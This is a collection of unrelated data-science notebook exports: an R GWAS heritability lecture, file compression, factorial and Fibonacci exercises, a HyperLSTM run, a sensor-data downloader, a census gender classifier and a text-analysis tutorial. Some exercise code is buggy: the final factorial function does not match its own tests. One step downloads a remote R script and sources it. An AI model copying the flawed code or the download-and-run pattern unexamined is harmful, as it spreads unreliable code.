https://raw.githubusercontent.com/timeu/gwas-lecture/master/data/cmeyer_glucs2015/bmeyer_etal.txt --create-dirs --output data/cmeyer_glucs2015/bmeyer_etal.txtThis is the R-script for estimating marginal and conditional variance in a mixed-model (merMod):curl https://raw.githubusercontent.com/timeu/gwas-lecture/master/data/cmeyer_glucs2015/hdr.estimate_r2_mixedmodels.R --create-dirs --output data/cmeyer_glucs2015/hdr.estimate_r2_mixedmodels.R ###Code ## if lme4 isn't installed, install it first: if (!require("lme4")) install.packages("lme4"); library(lme4); source("data/cmeyer_glucs2015/hdr.estimate_r2_mixedmodels.R"); glucosinolateFileName <- "data/cmeyer_glucs2015/bmeyer_etal.txt"; glucs <- read.table(glucosinolateFileName, header=T, sep="\t", as.is=T, stringsAsFactors=FALSE); glucs <- glucs[order(glucs[,"accession_id"]),]; dim(glucs); head(glucs); str(glucs); ## note that accession_id isn't a factor yet... ## it is numeric, so it is important to be explicit... glucs$accession_id <- as.factor(glucs$accession_id); ## adjust the ion counts by sample weight for( j in 3:ncol(glucs)){ glucosinolateVariableName <- colnames(glucs)[j]; glucs[[paste0(glucosinolateVariableName, "_per_mg")]] <- glucs[,glucosinolateVariableName] / glucs[,"sample_weight"]; ## in mg } ## there are 22 glucosinolate phenotypes, let's look at their distributions options(repr.plot.width=5, repr.plot.height=4) scaledGlucosinolates <- colnames(glucs)[grep("per_mg$", colnames(glucs))]; for( col_j in scaledGlucosinolates ){ scaledGluc_j <- glucs[,col_j]; hist(scaledGluc_j, breaks=100, col="cadetblue3", main=col_j, xlab=paste0("Ion counts, ", col_j)); } ###Output _____no_output_____ ###Markdown There's a surprising amount of zero-inflation in the data. To analyze data such as these, one can choose between (a) a zero-inflated model, (b) logistic regression (focusing on presence/absence of each metabolite), (c) attempting to standardize the data and analyze it using traditional linear approaches (not recommended but the most common approach; linear models are very robust), (d) analyzing the data as presence/absence data and, separately, abundance data before combining the results using Brown's _P_ value or a weighted Z-score approach. Let's use linear models to investigate the data, which is what the authors did ###Code results <- data.frame(method=character(), glucosinolate_name=character(), H2=numeric(), pvalue=numeric(), stringsAsFactors=FALSE); scaledGlucosinolates <- colnames(glucs)[grep("per_mg$", colnames(glucs))]; print(scaledGlucosinolates); for( col_j in scaledGlucosinolates ){ cat("Investigating:", col_j, "\n"); log_of_y <- log(glucs[,col_j] + 0.01); ## add an offset to avoid 0s which return -Inf lm.null <- lm(log_of_y ~ 1, data=glucs); lmer.alt <- lmer(log_of_y ~ 1 + (1|accession_id), data=glucs, REML=FALSE); results[nrow(results) + 1, "method"] <- "linear"; results[nrow(results), "glucosinolate_name"] <- col_j; ourEstimate <- r.squared.merMod(lmer.alt); results[nrow(results), "H2"] <- ourEstimate['Conditional'] - ourEstimate['Marginal']; ## note that the mixed model has to be specified first ## if sigma is on the boundary, this approach is conservative; consider exactLRT which estimates the p-value using simulations. ## source: https://bbolker.github.io/mixedmodels-misc/glmmFAQ.html results[nrow(results), "pvalue"] <- anova(lmer.alt, lm.null)[2, "Pr(>Chisq)"]; } results; title <- paste0("Heritability of glucosinolates"); hist(results[,"H2"], breaks=25, col="red", main=title, xlab=expression(paste("H"^"2"))) ###Output _____no_output_____
Changing_compression.ipynb
###Markdown Importing Libraries ###Code from zipfile import ZipFile import os import re import gzip ###Output _____no_output_____ ###Markdown finding files with zip extensions in './data/' directory ###Code data_folder = "./data/" # Loading the list of file in './data/' directory pattern = r'(.*)\.zip' files_n = [[par_n+"/",re.match(pattern, file)[1]] for par_n, dir_n, file_n in os.walk(data_folder) for file in file_n if re.match(pattern, file)!=None] # Changing the compression to gzip for path, file in files_n: # Extracting the zip file with ZipFile(path+file+'.zip', 'r') as zipf: zipf.extractall(path) # Compressing the extracted text file using gzip compression with open(path+file+'.txt', 'rb') as f_in, gzip.open(path+file+'.txt.gz', 'wb') as f_out: f_out.writelines(f_in) # Removing the extracted text file os.remove(path+file+'.txt') ###Output _____no_output_____ ###Markdown Uploading gzipped files ###Code # For uploading the gzipped files, run the following in command line # (assuming all the gzip files are directly inside ./data/ directory on your local machine) gsutil -m cp -r /data/*.gz gs://my-bucket/directory ###Output _____no_output_____
unit1/fibonacci.ipynb
###Markdown Task: создать функцию, которая возвращает n первых факториалов fact(4) [1, 1, 2, 6, 24] i.e. [0!, 1!, 2!, 3!, 4!] ###Code import unittest class TestFact(unittest.TestCase): """test factorial functions""" def test1(self): self.assertEqual(fact(0), [1]) self.assertEqual(fact(1), [1, 1]) self.assertEqual(fact(2), [1, 1, 2]) self.assertEqual(fact(3), [1, 1, 2, 6]) self.assertEqual(fact(5), [1, 1, 2, 6, 24, 120]) def fact(n): res = [] return res a=[4,8,9,0] a[2] res = [1] n = 7 for i in range(1, n): t = i*res[i-1] res.append(t) res def fact(n): res = [1] for i in range(1, n): t = i*res[i-1] res.append(t) return res fact(5) ###Output _____no_output_____ ###Markdown Task: создать функцию, которая возвращает n первых членов последовальности Fibonacci fib(7) [0, 1, 1, 2, 3, 5, 8, 13] ###Code def fib(n): res = [0, 1] return res import unittest class TestFib(unittest.TestCase): """test factorial functions""" def test1(self): self.assertEqual(fib(2), [0, 1]) self.assertEqual(fib(4), [0, 1, 1, 2]) self.assertEqual(fib(8), [0, 1, 1, 2, 3, 5, 8, 13]) if __name__ == '__main__': unittest.main(argv=['first-arg-is-ignored'], exit=False) res = [0,1] n = 7 for i in range(1, n): # t = res[i-1] t = res[i]+res[i-1] res.append(t) res def fib(n): res = [0,1] for i in range(1, n -1): t = res[i]+res[i-1] res.append(t) return res fib(10) t = 1 i = 1 n = 13 while i <= n: t = i*t # print(i,t) i = i+1 def fact2(n): i = 1 t = 1 while i <= n: t = i*t # print(i,t) i = i+1 return t fact2(15) assert fact2(1) == 1 assert fact2(2) == 2 assert fact2(3) == 6 n = int(input("number")) fact2(n) def fact_user(): s = input("number?") n = int(s) res = fact2(n) return res fact_user() t = 1 i = 1 while t <= 1e9: t = i*t print(i,t) i = i+1 ss = " AAABBBBCCCCCC" len(ss) "E" in ss ss.count("S") fact2(len(ss))/(fact2(ss.count("A")) * fact2(ss.count("B")) * fact2(ss.count("C"))) ###Output _____no_output_____
labml_nn/hypernetworks/experiment.ipynb
###Markdown [![Github](https://img.shields.io/github/stars/labmlai/annotated_deep_learning_paper_implementations?style=social)](https://github.com/labmlai/annotated_deep_learning_paper_implementations)[![Open In Colab](https://colab.research.google.com/assets/colab-badge.svg)](https://colab.research.google.com/github/labmlai/annotated_deep_learning_paper_implementations/blob/master/labml_nn/hypernetworks/experiment.ipynb) HyperLSTMThis is an experiment training Shakespear dataset with HyperLSTM from paper HyperNetworks. ###Code !pip install labml-nn from labml import experiment from labml_nn.hypernetworks.experiment import Configs # Create experiment experiment.create(name="hyper_lstm", comment='') # Create configs conf = Configs() # Load configurations experiment.configs(conf, # A dictionary of configurations to override {'tokenizer': 'character', 'text': 'tiny_shakespeare', 'optimizer.learning_rate': 2.5e-4, 'optimizer.optimizer': 'Adam', 'prompt': 'It is', 'prompt_separator': '', 'rnn_model': 'hyper_lstm', 'train_loader': 'shuffled_train_loader', 'valid_loader': 'shuffled_valid_loader', 'seq_len': 512, 'epochs': 128, 'batch_size': 2, 'inner_iterations': 25}) # Set models for saving and loading experiment.add_pytorch_models({'model': conf.model}) conf.init() # Start the experiment with experiment.start(): # `TrainValidConfigs.run` conf.run() ###Output _____no_output_____ ###Markdown [![Github](https://img.shields.io/github/stars/lab-ml/nn?style=social)](https://github.com/lab-ml/nn)[![Open In Colab](https://colab.research.google.com/assets/colab-badge.svg)](https://colab.research.google.com/github/lab-ml/nn/blob/master/labml_nn/hypernetworks/experiment.ipynb) HyperLSTMThis is an experiment training Shakespear dataset with HyperLSTM from paper HyperNetworks. ###Code !pip install labml-nn from labml import experiment from labml_nn.hypernetworks.experiment import Configs # Create experiment experiment.create(name="hyper_lstm", comment='') # Create configs conf = Configs() # Load configurations experiment.configs(conf, # A dictionary of configurations to override {'tokenizer': 'character', 'text': 'tiny_shakespeare', 'optimizer.learning_rate': 2.5e-4, 'optimizer.optimizer': 'Adam', 'prompt': 'It is', 'prompt_separator': '', 'rnn_model': 'hyper_lstm', 'train_loader': 'shuffled_train_loader', 'valid_loader': 'shuffled_valid_loader', 'seq_len': 512, 'epochs': 128, 'batch_size': 2, 'inner_iterations': 25}) # Set models for saving and loading experiment.add_pytorch_models({'model': conf.model}) conf.init() # Start the experiment with experiment.start(): # `TrainValidConfigs.run` conf.run() ###Output _____no_output_____
notebooks/download_sensor_community.ipynb
###Markdown Automated .csv downloadAutomated download of sensor data from [Sensor Community Archive](https://archive.sensor.community/csv_per_month/).Define `MONTH_START`, `MONTH_COUNT` and `SENSORS` for specifying the files that should be downloaded.Define `WAIT_BETWEEN_DOWNLOADS` to define the waiting time between in minutes one download started and the net begins. A random number between the two defined will be used.Define `LAT_RANGE` and `LON_RANGE` for geographical regions of interest. ###Code import requests from bs4 import BeautifulSoup as bs import time import os import zipfile import numpy as np import pandas as pd MONTH_START = "2020-01" # Start month in the format yyyy-mm MONTH_COUNT = 1 # sensor data will be downloaded for this amount of months URL = "https://archive.sensor.community/csv_per_month/" ROOT_DIR = os.path.join(os.curdir, "../data", "") WAIT_BETWEEN_DOWNLOADS = (0, 1) SENSORS = [ 'bme280', # 'bmp180', 'bmp280', 'dht22', # 'ds18b20', # 'hpm', # 'htu21d', # 'pms1003', # 'pms3003', # 'pms5003', # 'pms6003', # 'pms7003', # 'ppd42ns', 'sds011', ] LAT_RANGE = [ (53.013, 53.1456), (50.030681, 50.205692), ] # Bremen: (53.013, 53.1456) # Frankfurt a. M.: (50.030681, 50.205692) LON_RANGE = [ (8.67, 8.9334), (8.430634, 8.919868), ] # Bremen: (8.67, 8.9334) # Frankfurt a. M.: (8.430634, 8.919868) def write_to_log(log_file, *args): """writes text to the defined log file Args: log_file: path to the log file *args: one or more strings that are written to the log file """ with open(log_file, 'a') as log: for text in args: log.write(text) script_start = time.time() # make log file if it doesn't exist date = time.strftime('%Y_%m_%d') log_file_name = date + "_download_log.txt" log_file_dir = os.path.join(ROOT_DIR + log_file_name) print(log_file_dir) if not os.path.exists(ROOT_DIR): os.mkdir(ROOT_DIR) if os.path.isfile(log_file_dir): print('log file already exists.') print('New entries will be appended.') else: log = open(log_file_dir, "w") log.close() write_to_log(log_file_dir, "Session started at " + time.strftime('%Y_%m_%d-%H_%M_%S') + '\n') # make list of relevant months month_current = MONTH_START months = [MONTH_START] for month in range(MONTH_COUNT-1): y, m = month_current.split('-') if m == '12': m = '01' y = str(int(y) + 1) elif int(m) < 9: m = '0' + str(int(m) + 1) else: m = str(int(m) + 1) month_current = y + '-' + m months.append(month_current) write_to_log(log_file_dir, f"Months: {months}\n") # get download links for relevant months and sensors for month in months: # get url url_curr = URL + month + '/' print(url_curr) write_to_log(log_file_dir, f"URL: {url_curr}\n") # find download links according to the sensors list and save them with file names r = requests.get(url_curr) soup = bs(r.text) urls = [] names = [] for i, link in enumerate(soup.findAll('a')): if '.zip' in str(link) and any([sensor in str(link) for sensor in SENSORS]): url_download = url_curr + link.get('href') urls.append(url_download) names.append(soup.select('a')[i].attrs['href']) print("Files to download:") for file_name in names: print(file_name) write_to_log(log_file_dir, f"\tFiles: {names}\n") names_urls = zip(names, urls) # download files files_finished = 0 for name, url in names_urls: # define path where downloaded file will be saved category = name.split('.')[0].split('_')[-1] # directory = os.path.join(ROOT_DIR, category, "") directory = ROOT_DIR full_path = os.path.join(directory, name) if not os.path.exists(directory): os.mkdir(directory) # define path for processed .csv file processed_dir = os.path.join(ROOT_DIR, "SensorCommunity", "") if not os.path.exists(processed_dir): os.mkdir(processed_dir) name_csv = name.split('.')[0] + ".csv" csv_processed_dir = os.path.join(processed_dir, name_csv) # get path of unprocessed .csv file csv_full = os.path.join(directory, name_csv) # if the processed .csv file already exists skip download if os.path.isfile(csv_processed_dir) or os.path.isfile(csv_full) or os.path.isfile(full_path): if os.path.isfile(csv_processed_dir): write_to_log(log_file_dir, \ f"\t\t{csv_processed_dir} already exists... download and processing {name} gets skipped.\n") continue elif os.path.isfile(csv_full): write_to_log(log_file_dir, \ f"\t\t{csv_full} already exists... download of {name} gets skipped.\n") elif os.path.isfile(full_path): write_to_log(log_file_dir, \ f"\t\t{full_path} already exists... download of {name} gets skipped.\n") # download .zip file if it doesn't exist yet if not os.path.isfile(csv_full) and not os.path.isfile(full_path): print(f"Start downloading {name}.") start = time.time() response = requests.get(url, timeout=50) with open(full_path, 'wb') as f: f.write(response.content) end = time.time() print(f"The download took {round((end - start) / 60, 1)} minutes.") write_to_log(log_file_dir, \ f"\t\t{name}\n", \ f"\t\t\tDownload successfully finished after {(end - start) / 60} minutes.\n") if os.path.isfile(full_path): # unzip file print("Unzip file...") with zipfile.ZipFile(full_path, 'r') as zip_ref: zip_ref.extractall(directory) print("Unzipping finished") write_to_log(log_file_dir, f"\t\t\t{name} unzipped\n") # delete .zip os.remove(full_path) print(".zip file deleted") write_to_log(log_file_dir, f"\t\t\t.zip file deleted\n") # define the chunk size that is read from .csv chunksize = 10 ** 6 # read .csv chunkwise with pd.read_csv(csv_full, sep=";", chunksize=chunksize) as reader: write_to_log(log_file_dir, f"\t\t\tprocessing {csv_full}\n") print(f"processing {csv_full}\n") for i, chunk in enumerate(reader): # filter data by desired longitude and latitude for j, lat in enumerate(LAT_RANGE): df_temp = chunk[(chunk['lat'] > LAT_RANGE[j][0]) & \ (chunk['lat'] < LAT_RANGE[j][1]) & \ (chunk['lon'] > LON_RANGE[j][0]) & \ (chunk['lon'] < LON_RANGE[j][1])] # make a new file for the first chunk and append the subsequent chunks if not i and not j: df_temp.to_csv(csv_processed_dir, header=True, index=False) else: df_temp.to_csv(csv_processed_dir, mode='a', header=False, index=False) write_to_log(log_file_dir, f"\t\t\t\twrote chunk #{i} for region #{j}\n") #delete original .csv file os.remove(csv_full) write_to_log(log_file_dir, f"\t\t\t\t{csv_full} deleted\n") print(f"{csv_full} deleted") # wait before next download starts wait = np.random.randint(WAIT_BETWEEN_DOWNLOADS[0], WAIT_BETWEEN_DOWNLOADS[1]) print(f"Wait for {wait} minutes") write_to_log(log_file_dir, f"\t\t\twait for {wait} minutes\n\n") time.sleep(wait * 60) print() script_end = time.time() print(f"Finished script after {round((script_end - script_start) / 60, 1)} minutes") write_to_log(log_file_dir, f"Finished script after {round((script_end - script_start) / 60, 1)} minutes\n\n") ###Output _____no_output_____
AppModel.ipynb
###Markdown ###Code !pip install eli5 !pip install xgboost !pip install category_encoders !pip install shap ###Output Requirement already satisfied: eli5 in /usr/local/lib/python3.6/dist-packages (0.10.1) Requirement already satisfied: six in /usr/local/lib/python3.6/dist-packages (from eli5) (1.15.0) Requirement already satisfied: scikit-learn>=0.18 in /usr/local/lib/python3.6/dist-packages (from eli5) (0.22.2.post1) Requirement already satisfied: attrs>16.0.0 in /usr/local/lib/python3.6/dist-packages (from eli5) (20.2.0) Requirement already satisfied: graphviz in /usr/local/lib/python3.6/dist-packages (from eli5) (0.10.1) Requirement already satisfied: tabulate>=0.7.7 in /usr/local/lib/python3.6/dist-packages (from eli5) (0.8.7) Requirement already satisfied: scipy in /usr/local/lib/python3.6/dist-packages (from eli5) (1.4.1) Requirement already satisfied: numpy>=1.9.0 in /usr/local/lib/python3.6/dist-packages (from eli5) (1.18.5) Requirement already satisfied: jinja2 in /usr/local/lib/python3.6/dist-packages (from eli5) (2.11.2) Requirement already satisfied: joblib>=0.11 in /usr/local/lib/python3.6/dist-packages (from scikit-learn>=0.18->eli5) (0.16.0) Requirement already satisfied: MarkupSafe>=0.23 in /usr/local/lib/python3.6/dist-packages (from jinja2->eli5) (1.1.1) Requirement already satisfied: xgboost in /usr/local/lib/python3.6/dist-packages (0.90) Requirement already satisfied: scipy in /usr/local/lib/python3.6/dist-packages (from xgboost) (1.4.1) Requirement already satisfied: numpy in /usr/local/lib/python3.6/dist-packages (from xgboost) (1.18.5) Requirement already satisfied: category_encoders in /usr/local/lib/python3.6/dist-packages (2.2.2) Requirement already satisfied: statsmodels>=0.9.0 in /usr/local/lib/python3.6/dist-packages (from category_encoders) (0.10.2) Requirement already satisfied: scipy>=1.0.0 in /usr/local/lib/python3.6/dist-packages (from category_encoders) (1.4.1) Requirement already satisfied: pandas>=0.21.1 in /usr/local/lib/python3.6/dist-packages (from category_encoders) (1.1.2) Requirement already satisfied: patsy>=0.5.1 in /usr/local/lib/python3.6/dist-packages (from category_encoders) (0.5.1) Requirement already satisfied: numpy>=1.14.0 in /usr/local/lib/python3.6/dist-packages (from category_encoders) (1.18.5) Requirement already satisfied: scikit-learn>=0.20.0 in /usr/local/lib/python3.6/dist-packages (from category_encoders) (0.22.2.post1) Requirement already satisfied: python-dateutil>=2.7.3 in /usr/local/lib/python3.6/dist-packages (from pandas>=0.21.1->category_encoders) (2.8.1) Requirement already satisfied: pytz>=2017.2 in /usr/local/lib/python3.6/dist-packages (from pandas>=0.21.1->category_encoders) (2018.9) Requirement already satisfied: six in /usr/local/lib/python3.6/dist-packages (from patsy>=0.5.1->category_encoders) (1.15.0) Requirement already satisfied: joblib>=0.11 in /usr/local/lib/python3.6/dist-packages (from scikit-learn>=0.20.0->category_encoders) (0.16.0) Collecting shap [?25l Downloading https://files.pythonhosted.org/packages/d2/17/37ee6c79cafbd9bb7423b54e55ea90beec66aa7638664d607bcc28de0bae/shap-0.36.0.tar.gz (319kB)  |████████████████████████████████| 327kB 5.5MB/s [?25hRequirement already satisfied: numpy in /usr/local/lib/python3.6/dist-packages (from shap) (1.18.5) Requirement already satisfied: scipy in /usr/local/lib/python3.6/dist-packages (from shap) (1.4.1) Requirement already satisfied: scikit-learn in /usr/local/lib/python3.6/dist-packages (from shap) (0.22.2.post1) Requirement already satisfied: pandas in /usr/local/lib/python3.6/dist-packages (from shap) (1.1.2) Requirement already satisfied: tqdm>4.25.0 in /usr/local/lib/python3.6/dist-packages (from shap) (4.41.1) Collecting slicer Downloading https://files.pythonhosted.org/packages/46/cf/f37ac7f61214ed044b0df91252ab19376de5587926c5b572f060eb7bf257/slicer-0.0.4-py3-none-any.whl Requirement already satisfied: numba in /usr/local/lib/python3.6/dist-packages (from shap) (0.48.0) Requirement already satisfied: joblib>=0.11 in /usr/local/lib/python3.6/dist-packages (from scikit-learn->shap) (0.16.0) Requirement already satisfied: python-dateutil>=2.7.3 in /usr/local/lib/python3.6/dist-packages (from pandas->shap) (2.8.1) Requirement already satisfied: pytz>=2017.2 in /usr/local/lib/python3.6/dist-packages (from pandas->shap) (2018.9) Requirement already satisfied: setuptools in /usr/local/lib/python3.6/dist-packages (from numba->shap) (50.3.0) Requirement already satisfied: llvmlite<0.32.0,>=0.31.0dev0 in /usr/local/lib/python3.6/dist-packages (from numba->shap) (0.31.0) Requirement already satisfied: six>=1.5 in /usr/local/lib/python3.6/dist-packages (from python-dateutil>=2.7.3->pandas->shap) (1.15.0) Building wheels for collected packages: shap Building wheel for shap (setup.py) ... [?25l[?25hdone Created wheel for shap: filename=shap-0.36.0-cp36-cp36m-linux_x86_64.whl size=456467 sha256=a5869ed98d3fe9b30fc0873d73389f9de87c0bde8717a1d76b9f0d9158992d09 Stored in directory: /root/.cache/pip/wheels/fb/15/e1/8f61106790da27e0765aaa6e664550ca2c50ea339099e799f4 Successfully built shap Installing collected packages: slicer, shap Successfully installed shap-0.36.0 slicer-0.0.4 ###Markdown Import of Libraries needed ###Code import pandas as pd import numpy as np import shap from sklearn.metrics import accuracy_score from sklearn.model_selection import train_test_split from sklearn.pipeline import make_pipeline from sklearn.ensemble import RandomForestClassifier from sklearn.impute import SimpleImputer from category_encoders import OrdinalEncoder from xgboost import XGBClassifier from sklearn.inspection import permutation_importance from sklearn.model_selection import RandomizedSearchCV, GridSearchCV from sklearn.metrics import classification_report, plot_confusion_matrix, plot_roc_curve import matplotlib.pyplot as plt from sklearn.model_selection import GridSearchCV from sklearn.model_selection import cross_val_score ###Output _____no_output_____ ###Markdown Import Datasets ###Code census = pd.read_csv('https://raw.githubusercontent.com/VPDeb/DS-Unit-2-Applied-Modeling/master/Build%20Week%20Project/census.csv') ###Output _____no_output_____ ###Markdown Begin EDA ###Code #Time to make the 'missing' values into NaN so we can work with them census.replace({'?': np.NaN}, inplace=True) #Printing Top Values to Fill NaNs print('Top Value:',census['native-country'].describe()) print('Top Value:',census['occupation'].describe()) print('Top Value:',census['workclass'].describe()) #filling NaN values census['workclass'].replace({np.NaN : 'Private'},inplace=True) census['occupation'].replace({np.NaN : 'Prof-specialty'}, inplace=True) census['native-country'].replace({np.NaN : 'United-States'},inplace=True) ###Output _____no_output_____ ###Markdown Working on the wrangle function. Not sure how to get these three def/if/else functions wrapped into one working or multi working function inside of a wranglefunction🤔 ###Code #Create a New Feature that changes the income column into a 1 if they make more than 50K a year and 0 if they make 50K or less. New Feature called 'makes-50K+'. def over50K(census): if census['income'] == '>50K': val = 1 else: val = 0 return val census['makes-50K+'] = census.apply(over50K, axis=1) #Create a New Feature that changes the hours worked per week column into a 1 if they worked more than 40 hrs a week and 0 if they worked 40 or less. New Feature called 'over40hrs'. def over40(census): if census['hours-per-week'] >40: val = 1 else: val = 0 return val census['over40hrs+'] = census.apply(over40, axis=1) #Create a New Feature that changes the sex column into a 1 if they were Female and 0 if they were Male. New Feature called 'gender-F/1-M/0'. This is new Target column. def gender(census): if census['sex'] == 'Female': val = 1 else: val = 0 return val census['gender-F/1-M/0'] = census.apply(gender, axis=1) # Time to drop columns we don't need anylonger. Feature'fnlwgt' is high card and Unnecessary while 'sex' would now become a leaky feature and income and hours per week are now redundant census = census.drop(columns=['fnlwgt','income','hours-per-week','sex','capital-gain','capital-loss']) ###Output _____no_output_____ ###Markdown Splitting the Data ###Code #Split data randomly with a 60/20/20 split train, val, test = np.split(census.sample(frac=1), [int(.6*len(census)), int(.8*len(census))]) #Split the data into X and y for training the model and making predictions target= 'gender-F/1-M/0' y_train = train[target] X_train = train.drop(target,axis=1) y_val = val[target] X_val = val.drop(target,axis=1) y_test = test[target] X_test = test.drop(target,axis=1) ###Output _____no_output_____ ###Markdown Establishing the Baseline ###Code print('Baseline Accuracy:', y_train.value_counts(normalize=True).max()) ###Output Baseline Accuracy: 0.6679406244668146 ###Markdown Building the Model ###Code #Starting with a pipeline. Using OrdinalEncoder for the object columns, we do not need and Imputer since they were all filled with top values and I am working with XGBClassifier. modelxgb = make_pipeline( OrdinalEncoder(), XGBClassifier(n_jobs=-1) ) modelxgb.fit(X_train,y_train) print('Training accuracy:', modelxgb.score(X_train, y_train)) print('Validation accuracy:', modelxgb.score(X_val, y_val)) modelxgb.fit(X_train, y_train) # make predictions for test data y_pred = modelxgb.predict(X_test) # evaluate predictions from sklearn.metrics import accuracy_score accuracy = accuracy_score(y_test, y_pred) print("Accuracy: %.2f%%" % (accuracy * 100.0)) %matplotlib inline import seaborn as sns sns.distplot(y_train); from joblib import dump dump(modelxgb, 'Pipeline.joblib2', compress=True) ###Output _____no_output_____
curriculum/2_data_exploration_and_analysis/text-analysis/text_analysis_social_services.ipynb
###Markdown Text Analysis--- Introduction**Text analysis** is used to extract useful information from or summarize a large amount of unstructured text stored in documents. This opens up the opportunity of using text data alongside more conventional data sources (e.g. surveys and administrative data). The goal of text analysis is to take a large corpus of complex and unstructured text data and extract important and meaningful messages in a comprehensible way. Text analysis can help with the following tasks:* **Information Retrieval**: Find relevant information in a large database, such as a systematic literature review, that would be very time-consuming for humans to do manually. * **Clustering and Text Categorization**: Summarize a large corpus of text by finding the most important phrases, using methods like topic modeling. * **Text Summarization**: Create category-sensitive text summaries of a large corpus of text. * **Machine Translation**: Translate documents from one language to another. In this tutorial, we are going to analyze social services descriptions using topic modeling to examine the content of our data and document classification to tag the type of job in the advertisement. Learning OutcomesIn this tutorial, you will...* Learn how to transform a corpus of text into a structured matrix format so that we can apply natural language processing (NLP) methods* Learn the basics and applications of topic modeling* Learn how to do document tagging and evaluate the results Glossary of Terms* **Corpus**: A corpus is the set of all text documents used in your analysis; for example, your corpus of text may include hundreds of research articles.* **Tokenize**: Tokenization is the process by which text is separated into meaningful terms or phrases. In English this is easy to do for individual words, as they are separated by whitespace; however, it can get more complicated to automate determining which groups of words constitute meaningful phrases. * **Stemming**: Stemming is normalizing text by reducing all forms or conjugations of a word to the word's most basic form. In English, this can mean making a rule of removing the suffixes "ed" or "ing" from the end of all words, but it gets more complex. For example, "to go" is irregular, so you need to tell the algorithm that "went" and "goes" stem from a common lemma, and should be considered alternate forms of the word "go."* **TF-IDF**: TF-IDF (term frequency-inverse document frequency) is an example of feature engineering where the most important words are extracted by taking account their frequency in documents and the entire corpus of documents as a whole.* **Topic Modeling**: Topic modeling is an unsupervised learning method where groups of words that often appear together are clustered into topics. Typically, the words in one topic should be related and make sense (e.g. boat, ship, captain). Individual documents can fall under one topic or multiple topics. * **LDA**: LDA (Latent Dirichlet Allocation) is a type of probabilistic model commonly used for topic modeling. * **Stop Words**: Stop words are words that have little semantic meaning but occur very frequently, like prepositions, articles and common nouns. For example, every document (in English) will probably contain the words "and" and "the" many times. You will often remove them as part of preprocessing using a list of stop words. ###Code %pylab inline import nltk import ujson import re import time import progressbar import pandas as pd from __future__ import print_function from six.moves import zip, range from sklearn.model_selection import train_test_split from sklearn.feature_extraction.text import CountVectorizer, TfidfTransformer from sklearn.decomposition import LatentDirichletAllocation from sklearn.linear_model import LogisticRegression from sklearn.metrics import precision_recall_curve, roc_auc_score, auc from sklearn import preprocessing from collections import Counter, OrderedDict from nltk.corpus import stopwords from nltk import SnowballStemmer #nltk.download('stopwords') #download the latest stopwords ###Output _____no_output_____ ###Markdown Load the DataOur dataset for this tutorial will be a description of social services in Chicago, and how the subset we're using was created, can be found in the `data` folder in this tutorial. ###Code df_socialservices_data = pd.read_csv('./data/socialservices.csv') ###Output _____no_output_____ ###Markdown Explore the Data ###Code df_socialservices_data.head() ###Output _____no_output_____ ###Markdown Our table has 7 fields: `FACID`, `facname`, `factype`, `facurl`, `facloc`, `abouturl`, and `textfromurl`. How many facilities and types of facilities are in this dataset? ###Code df_socialservices_data.factype.unique() df_socialservices_data.facname.unique() df_socialservices_data.facname.unique().shape ###Output _____no_output_____ ###Markdown There are 48 facilities, categorized into 4 unique facility types: education, income, health, and safety net. Topic ModelingWe are going to apply topic modeling, an unsupervised learning method, to our corpus to find the high-level topics in our corpus as a "first go" for exploring our data. Through this process, we'll discuss how to clean and preprocess our data to get the best results.Topic modeling is a broad subfield of machine learning and natural language processing. We are going to focus on a common modeling approach called Latent Dirichlet Allocation (LDA). To use topic modeling, we first have to assume that topics exist in our corpus, and that some small number of these topics can "explain" the corpus. Topics in this context refer to words from the corpus, in a list that is ranked by probability. A single document can be explained by multiple topics. For instance, an article on net neutrality would fall under the topic "technology" as well as the topic "politics." The set of topics used by a document is known as the document's allocation, hence, the name Latent Dirchlet Allocation, each document has an allocation of latent topics allocated by Dirchlet distribution. Processing Text DataThe first important step in working with text data is cleaning and processing the data, which includes (but is not limited to) *forming a corpus of text, tokenization, removing stop-words, finding words co-located together (N-grams), and stemming and lemmatization*. Each of these steps will be discussed below. The ultimate goal is to transform our text data into a form an algorithm can work with, because a document or a corpus of text cannot be fed directly into an algorithm. Algorithms expect numerical feature vectors with certain fixed sizes, and can't handle documents, which are basically sequences of symbols with variable length. We will be transforming our text corpus into a *bag of n-grams* to be further analyzed. In this form our text data is represented as a matrix where each row refers to a specific job description (document) and each column is the occurence of a word (feature). Bag of N-gram Representation ExampleUltimately, we want to take our collection of documents, corpus, and convert it into a matrix. Fortunately, `sklearn` has a pre-built object, `CountVectorizer`, that can tokenize, eliminate stopwords, identify n-grams, and stem our corpus, and output a matrix in one step. Before we apply the vectorizer to our corpus of data, let's apply it to a toy example so that we see what the output looks like and how a bag of words is represented. ###Code def create_bag_of_words(corpus, NGRAM_RANGE=(0,1), stop_words = None, stem = False, MIN_DF = 0.05, MAX_DF = 0.95, USE_IDF=False): """ Turn a corpus of text into a bag-of-words. Parameters ----------- corpus: ls test of documents in corpus NGRAM_RANGE: tuple range of N-gram. Default (0,1) stop_words: ls list of commonly occuring words that have little semantic value stem: bool use a stemmer to stem words MIN_DF: float exclude words that have a frequency less than the threshold MAX_DF: float exclude words that have a frequency greater than the threshold Returns ------- bag_of_words: scipy sparse matrix scipy sparse matrix of text features: ls of words """ #parameters for vectorizer ANALYZER = "word" #unit of features are single words rather then phrases of words STRIP_ACCENTS = 'unicode' stemmer = nltk.SnowballStemmer("english") if stem: tokenize = lambda x: [stemmer.stem(i) for i in x.split()] else: tokenize = None vectorizer = CountVectorizer(analyzer=ANALYZER, tokenizer=tokenize, ngram_range=NGRAM_RANGE, stop_words = stop_words, strip_accents=STRIP_ACCENTS, min_df = MIN_DF, max_df = MAX_DF) bag_of_words = vectorizer.fit_transform( corpus ) #transform our corpus is a bag of words features = vectorizer.get_feature_names() if USE_IDF: NORM = None #turn on normalization flag SMOOTH_IDF = True #prvents division by zero errors SUBLINEAR_IDF = True #replace TF with 1 + log(TF) transformer = TfidfTransformer(norm = NORM,smooth_idf = SMOOTH_IDF,sublinear_tf = True) #get the bag-of-words from the vectorizer and #then use TFIDF to limit the tokens found throughout the text tfidf = transformer.fit_transform(bag_of_words) return tfidf, features else: return bag_of_words, features toy_corpus = ['this is document one', 'this is document two', 'text analysis on documents is fun'] toy_bag_of_words, toy_features = create_bag_of_words(toy_corpus) toy_corpus toy_features np_bag_of_words = toy_bag_of_words.toarray() np_bag_of_words ###Output _____no_output_____ ###Markdown Our data has been transformed from a document into a 3 x 9 matrix, where each row in the matrix corresponds to a document, and each column corresponds to a feature (in the order they appear in `toy_features`). A 1 indicates the existence of the feature or word in the document, and a 0 indicates the word is not present.It is very common that this representation will be a "sparse" matrix, or a matrix that has a 